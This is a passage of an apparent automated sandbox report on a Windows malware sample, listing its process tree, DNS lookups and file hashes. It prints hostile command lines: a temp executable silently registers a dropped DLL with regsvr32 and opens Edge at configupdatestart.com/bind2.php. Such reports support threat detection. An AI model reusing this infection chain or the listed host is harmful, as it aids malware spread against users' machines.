| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe
"C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s C:\Windows\system32\eyfwin.dll
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://configupdatestart.com/bind2.php?id=3913842
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcf99546f8,0x7ffcf9954708,0x7ffcf9954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | configupdatestart.com | udp |
| US | 8.8.8.8:53 | 208.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | configupdatestart.com | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | configupdatestart.com | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | configupdatestart.com | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
memory/2096-0-0x0000000000400000-0x0000000000470000-memory.dmp
C:\Windows\SysWOW64\eyfwin.dll
| MD5 | 732cadeaf934ac1edc47f1a577eca711 |
| SHA1 | 444f18e24d9c48e99b142c85ba6e65cba693988f |
| SHA256 | e232ef1159527f8ef57f480dcf0399d9b718354e90449545b1a3b7ea30015871 |
| SHA512 | 9b8a8e36b8e7292915a99a47796cd89dab6af4a506bf956093cbcefc24a4b7d3864f26c50d4b4326c38d03a8aca8c4be822e1702b436e9a97b1e084c6e9c0e5f |
memory/2096-29-0x0000000000400000-0x0000000000470000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1386433ecc349475d39fb1e4f9e149a0 |
| SHA1 | f04f71ac77cb30f1d04fd16d42852322a8b2680f |
| SHA256 | a7c79320a37d3516823f533e0ca73ed54fc4cdade9999b9827d06ea9f8916bbc |
| SHA512 | fcd5449c58ead25955d01739929c42ffc89b9007bc2c8779c05271f2d053be66e05414c410738c35572ef31811aff908e7fe3dd7a9cef33c27acb308a420280e |
\??\pipe\LOCAL\crashpad_5116_NKYUNPLPEKLHMVSD
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b09b1e217ce2b60ba6be793c23caafa3 |
| SHA1 | d6debfe5d552293ab8781e8d45dee4a2cfb5635e |
| SHA256 | e9713de62aa928411d91507c5bf05e9cc6bd1ab1f494b48703f039876e986193 |
| SHA512 | ec21be7c597502648e8d74207a9371d3fde762bc853c62263f02ce70fa7be073a2caa364c3ae5390d2e8704e741d0769a6116e14f4be9b629a92f8a6d718e1c8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\60d0e30b-3aae-4d4c-a160-9dec8624c188.tmp
| MD5 | 7a742df440dfce965bc943b3d52043b3 |
| SHA1 | b36169f5a8b66c4faee010583872c67b65df04b4 |
| SHA256 | eea4a0179cf1c166c0509f6caede3bd57b4fe9ff07f62e25b9be1b083366c465 |
| SHA512 | 6868cd6eb7b50cbe0fae51def840761d1003d2193e77d512449113c7fa728cf08cb201a962ec9b2503efd76df5a56252e7cea00a0d2db6b7c6d69ec0c3048be2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0591379cac5973852be77ad276026495 |
| SHA1 | 81f458db4ef0484e520e660f37306234a267614e |
| SHA256 | c0079cbd1beac2a5588e5f3d4b59ba5237661d9944315bdba32581a6260da4f9 |
| SHA512 | 1d3b61279e0649d5310ad08e4074f312c3baf8b580cedcf85f4d56f51467b4383b8e981e6aa3de021e7178aa41d0c8e935d8a67c06fbb47824171ea83d1701be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | e664066e3aa135f185ed1c194b9fa1f8 |
| SHA1 | 358ff3c6ad0580b8ae1e5ef2a89a4e597c2efdc5 |
| SHA256 | 86e595be48dbc768a52d7ea62116036c024093e1302aced8c29dd6a2d9935617 |
| SHA512 | 58710818b5f664006a5aa418da6c8cd3f709c2265bc161f81b9dfe6cdb8304fabaa4ce9deba419fe4281623feeeaa0321f481ae5855d347c6d8cf95968ee905e |